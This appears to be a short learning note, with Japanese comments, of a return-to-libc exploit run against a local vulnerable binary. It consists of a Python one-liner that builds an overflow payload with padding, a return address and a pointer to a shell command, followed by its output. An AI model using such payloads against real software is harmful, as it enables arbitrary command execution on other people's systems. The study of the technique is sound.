( '-') python -c 'print "x"*(76) + "\x00\x83\x04\x08" + \
"\x00\x00\x00\x00" + "\xd8\xd4\xff\xff" + "ls -l /etc/passwd"
' > shine
( '-') cat shine | ./a.out
-rw-r--r-- 1 root root 2038 Jan 14 14:00 /etc/passwd
zsh: done cat shine |
zsh: segmentation fault ./a.out
これは後続の "ls -l /etc/passwd" のアドレス
return to libc などと呼ばれる手法のようです